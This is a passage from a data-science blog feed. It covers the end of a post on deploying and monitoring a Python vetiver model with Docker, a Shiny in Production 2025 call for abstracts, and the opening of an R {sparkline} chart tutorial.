&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start with python base image&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;python:3.10&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create directory in container for vetiver files&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;WORKDIR&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;/vetiver&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# copy and install requirements&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; vetiver_requirements.txt /vetiver/requirements.txt&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; pip install --no-cache-dir --upgrade -r /vetiver/requirements.txt&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# copy app file&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; app.py /vetiver/app/app.py&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# expose port&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;EXPOSE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;8080&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# run vetiver API&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;CMD&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;uvicorn&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;app.app:api&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;--host&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;--port&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;8080&amp;#34;&lt;/span&gt;]&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With these files uploaded to the cloud server of your choosing,
&lt;code&gt;docker build&lt;/code&gt; will assemble the image and &lt;code&gt;docker run&lt;/code&gt; will start the
API, which listens on port 8080 inside the container. This process can be
automated on AWS, Google Cloud Run, Azure, and many other cloud
platforms.&lt;/p&gt;
&lt;h3 id="model-monitoring"&gt;Model monitoring&lt;/h3&gt;
&lt;p&gt;Success! Your model is now deployed and your users are interacting with
it. But this is only the beginning…&lt;/p&gt;
&lt;p&gt;Data changes! Over time you will notice various aspects of your data
changing in unexpected ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The way the data is distributed may change (&lt;strong&gt;data drift&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;The relationship between the target variable and covariates may change
(&lt;strong&gt;concept drift&lt;/strong&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These two processes will conspire to create &lt;strong&gt;model drift&lt;/strong&gt;, where your
model predictions start to drift away from the true values. This is why
MLOps is not simply a one-off deployment. It is a continuous cycle in
which you will be retraining your model on the latest data on a regular
basis.&lt;/p&gt;
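&lt;p&gt;As a rough illustration of data drift, the sketch below compares the mean of each feature in a recent batch of inputs against the training data, expressed in units of the training standard deviation. The &lt;code&gt;mean_shift&lt;/code&gt; helper and all of the numbers are made up for this example. This is one simple check among many, and it is not a vetiver function.&lt;/p&gt;

```python
import statistics


def mean_shift(train_values, new_values):
    """Shift in the mean of new data, in units of the training standard deviation."""
    spread = statistics.pstdev(train_values) or 1.0
    return (statistics.fmean(new_values) - statistics.fmean(train_values)) / spread


# Made-up feature values: training data versus a recent batch of API inputs.
train = {"bmi": [19.1, 18.6, 18.1, 17.6], "schooling": [10.1, 10.0, 9.9, 9.8]}
recent = {"bmi": [19.0, 18.4, 18.3, 17.7], "schooling": [11.2, 11.4, 11.1, 11.3]}

shifts = {name: mean_shift(train[name], recent[name]) for name in train}
# Rank features from most to least shifted.
ranked = sorted(shifts, key=lambda n: abs(shifts[n]), reverse=True)
for name in ranked:
    print(f"{name}: {shifts[name]:+.2f} training standard deviations")
```

&lt;p&gt;In this toy batch the schooling values have moved well away from the training data while the BMI values have not, so schooling would be the first place to look if predictions started to degrade.&lt;/p&gt;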
&lt;p&gt;We will not provide a full worked example of model monitoring here, but
vetiver offers some helpful functions for tracking model drift:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/vetiver-python/stable/reference/compute_metrics.html" rel="external"&gt;&lt;code&gt;vetiver.compute_metrics()&lt;/code&gt;&lt;/a&gt;:
computes key metrics at specified time intervals, allowing us to
understand how the model performance varies over time.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/vetiver-python/stable/reference/pin_metrics.html" rel="external"&gt;&lt;code&gt;vetiver.pin_metrics()&lt;/code&gt;&lt;/a&gt;:
stores the model metrics in a pins board for future retrieval.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/vetiver-python/stable/reference/plot_metrics.html" rel="external"&gt;&lt;code&gt;vetiver.plot_metrics()&lt;/code&gt;&lt;/a&gt;:
plots the metrics over time.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can get an idea of how these functions can be used by reading
our previous blog post where we &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/#monitoring-our-model"&gt;monitored the model’s performance using
vetiver for
R&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The metrics can be entirely defined by the user, and might include the
accuracy score for a classification model and the mean squared error for
a regression model. We can also make use of predefined scoring functions
from the &lt;code&gt;sklearn.metrics&lt;/code&gt; library.&lt;/p&gt;
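&lt;p&gt;The idea of scoring a model at regular intervals can be sketched in plain Python. The example below is not vetiver's implementation. The &lt;code&gt;metric_by_month&lt;/code&gt; helper, the monthly grouping and the monitoring log are all assumptions made for illustration. Any function that takes the true values followed by the predictions could be passed as the metric, which is the argument order used by the scoring functions in &lt;code&gt;sklearn.metrics&lt;/code&gt;.&lt;/p&gt;

```python
import statistics
from collections import defaultdict
from datetime import date


def metric_by_month(records, metric):
    """Group (date, truth, prediction) records by month and score each group."""
    groups = defaultdict(list)
    for day, truth, estimate in records:
        groups[(day.year, day.month)].append((truth, estimate))
    return {
        month: metric([t for t, _ in pairs], [e for _, e in pairs])
        for month, pairs in sorted(groups.items())
    }


def mean_absolute_error(truth, estimate):
    """A user-defined metric: the average absolute prediction error."""
    return statistics.fmean([abs(t - e) for t, e in zip(truth, estimate)])


# Made-up monitoring log: the predictions get worse in the second month.
log = [
    (date(2025, 1, 5), 65.0, 64.0),
    (date(2025, 1, 20), 59.9, 60.9),
    (date(2025, 2, 3), 59.5, 62.5),
    (date(2025, 2, 17), 59.2, 64.2),
]
monthly = metric_by_month(log, mean_absolute_error)
print(monthly)
```

&lt;p&gt;A steadily rising error from one period to the next is the kind of signal that would prompt retraining on the latest data.&lt;/p&gt;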
&lt;p&gt;For more on model monitoring, check out the &lt;a href="https://vetiver.posit.co/get-started/monitor.html" rel="external"&gt;Posit vetiver
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Hopefully this post has given you a better understanding of MLOps and
how to get started with it in Python. Most importantly, you
don’t have to be an expert in AWS or Azure to get started! Vetiver
provides intuitive, easy-to-use functions for learning the crucial steps
of MLOps including versioning your model, building a model API, and
deploying your model using Docker or Posit Connect.&lt;/p&gt;
&lt;p&gt;For some further reading, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Our previous blog posts on &lt;a href="https://www.jumpingrivers.com/blog/?search=vetiver" rel="external"&gt;vetiver with
R&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://vetiver.posit.co/" rel="external"&gt;Posit vetiver documentation&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Call for Abstracts</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/</link><pubDate>Mon, 17 Feb 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="call-for-abstracts-now-open"&gt;Call for abstracts now open&lt;/h3&gt;
&lt;p&gt;We are excited to announce the Call for Abstracts for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2025&lt;/a&gt;, to be held on 8th-9th October 2025 in Newcastle upon Tyne, UK. This event brings together industry experts, data scientists, and developers to explore the latest advancements and best practices in deploying Shiny applications in production settings.&lt;/p&gt;
&lt;h3 id="about-the-conference"&gt;About the Conference&lt;/h3&gt;
&lt;p&gt;As Shiny continues to revolutionise data visualisation and interactive web applications, the need for robust, scalable, and efficient production environments is more critical than ever. This conference aims to address these needs by providing a platform for knowledge sharing, collaboration, and innovation.&lt;/p&gt;
&lt;p&gt;Whether you’re a seasoned {shiny} user who wants to network and share knowledge, someone who’s just getting started and wants to learn from the experts, or anybody in between, if you’re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;h3 id="topics-of-interest"&gt;Topics of Interest&lt;/h3&gt;
&lt;p&gt;We invite abstracts on a wide range of topics, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI &amp;amp; Machine Learning in Shiny:&lt;/strong&gt; Integrating predictive models, LLMs, and generative AI into Shiny applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny for Large Enterprises:&lt;/strong&gt; How big companies successfully deploy and maintain Shiny apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Storytelling with Shiny:&lt;/strong&gt; Making complex data insights accessible through compelling visual narratives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny vs. Other Web Frameworks:&lt;/strong&gt; A comparison of when and why to choose Shiny over alternatives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Beyond Dashboards / Creative Uses of Shiny:&lt;/strong&gt; Exploring non-traditional applications like simulations, process automation, and interactive reports.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Python:&lt;/strong&gt; Developing Shiny apps in Python.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing and Continuous Deployment:&lt;/strong&gt; Best practices for maintaining high-quality applications through automated workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get an idea of past topics, check out our YouTube channel, where we have playlists of talks from Shiny in Production &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;amp;si=b2GWgsZ-k5WC8QAD" rel="external"&gt;2022&lt;/a&gt;, &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;amp;si=BGLJYKWc5ZIGwrUZ" rel="external"&gt;2023&lt;/a&gt; and
&lt;a href="https://www.youtube.com/watch?v=8mLFQUwnU5g&amp;amp;list=PLbARZQfpqIKK3fHYTo__ZY-IIsF2eiE0X" rel="external"&gt;2024&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="submission-guidelines"&gt;Submission Guidelines&lt;/h3&gt;
&lt;p&gt;To submit your abstract, please follow these guidelines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Abstract length: Up to 250 words.&lt;/li&gt;
&lt;li&gt;Deadline: Submissions must be received by 11:59 PM on 20th March 2025.&lt;/li&gt;
&lt;li&gt;Submission portal: Submit your abstract &lt;a href="https://jumpingrivers.typeform.com/to/WnGwkqYy" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="important-dates"&gt;Important Dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Abstract submission deadline: 20th March 2025&lt;/li&gt;
&lt;li&gt;Notification of acceptance: mid-April 2025&lt;/li&gt;
&lt;li&gt;Conference dates: 8th-9th October 2025&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, visit our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-call-for-abstracts/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sparkline Package for Inline Visualisations</title><link>https://www.jumpingrivers.com/blog/sparkline/</link><pubDate>Thu, 13 Feb 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sparkline/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sparkline/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sparkline/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;h3 id="sparkline"&gt;Sparkline&lt;/h3&gt;
&lt;p&gt;This is the introductory part of a blog series; the second part will
cover embedding sparklines in HTML tables. The CRAN
&lt;a href="https://cran.r-project.org/web/packages/sparkline/readme/README.html" rel="external"&gt;{sparkline}&lt;/a&gt;
package allows you to make small, inline HTML charts in R using
&lt;a href="https://jquery.com/" rel="external"&gt;jQuery&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="charts-available-with-sparkline"&gt;Charts Available With {sparkline}&lt;/h4&gt;
&lt;p&gt;You can make the following charts with the package:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Line&lt;/li&gt;
&lt;li&gt;Bar&lt;/li&gt;
&lt;li&gt;Tristate&lt;/li&gt;
&lt;li&gt;Discrete&lt;/li&gt;
&lt;li&gt;Bullet&lt;/li&gt;
&lt;li&gt;Pie&lt;/li&gt;
&lt;li&gt;Box Plot&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;a href="https://omnipotent.net/jquery.sparkline/#s-about" rel="external"&gt;omnipotent.net&lt;/a&gt;
website has a great feature for viewing the different types of chart. I
will show a few examples here, along with the code for producing them.&lt;/p&gt;
&lt;p&gt;Note that the documentation for all of the different charts is great and can
be found &lt;a href="https://omnipotent.net/jquery.sparkline/#s-docs" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;All of the plots from this package use the &lt;code&gt;sparkline()&lt;/code&gt; function, and we
pass the type of chart we want as the &lt;code&gt;type&lt;/code&gt; argument (the default is a line chart).
The function takes a vector or list as the &lt;code&gt;values&lt;/code&gt; argument.
Depending on the type of chart we are creating, this can be either the data
to plot or specifications for the plot.&lt;/p&gt;
&lt;p&gt;Note: I am using &lt;code&gt;spk_add_deps()&lt;/code&gt;, which attaches the required JavaScript dependencies, so that the charts can be displayed in this blog.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-sparkline"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="line"&gt;Line&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;line1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;spk_add_deps&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline line chart" width="22%" height="120" src="html_files/line1.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;We can remove the fill and the spots using the following arguments.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;line2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;, spotRadius &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, fillColor &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline line chart" width="22%" height="120" src="html_files/line2.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h4 id="bar"&gt;Bar&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bar1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bar chart" width="22%" height="120" src="html_files/bar1.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;We can change the bar colour, spacing and width.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bar2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;, barColor &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, barSpacing &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;10&amp;#34;&lt;/span&gt;, barWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bar chart" width="22%" height="120" src="html_files/bar2.html" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h4 id="box-plots"&gt;Box Plots&lt;/h4&gt;
&lt;p&gt;For box plots, the data passed to the &lt;code&gt;values&lt;/code&gt; argument will be used to
calculate the chart. If you want to pass in pre-computed values such as the
median, max or min, you can do this by setting &lt;code&gt;raw = TRUE&lt;/code&gt;
and passing them in as the &lt;code&gt;values&lt;/code&gt; argument.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;box&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline boxplot" width="22%" height="120" src="html_files/box.html" frameBorder="0" scrolling="no"&gt;&lt;/iframe&gt;
&lt;h4 id="bullet-graph"&gt;Bullet Graph&lt;/h4&gt;
&lt;p&gt;This is one of the chart types where the &lt;code&gt;values&lt;/code&gt; passed correspond to
specifications for the plot; they should be ordered as: target,
performance, range1, range2, range3.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bullet1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="Sparkline bullet graph" width="22%" height="120" src="html_files/bullet1.html" frameBorder="0" scrolling="no"&gt;&lt;/iframe&gt;
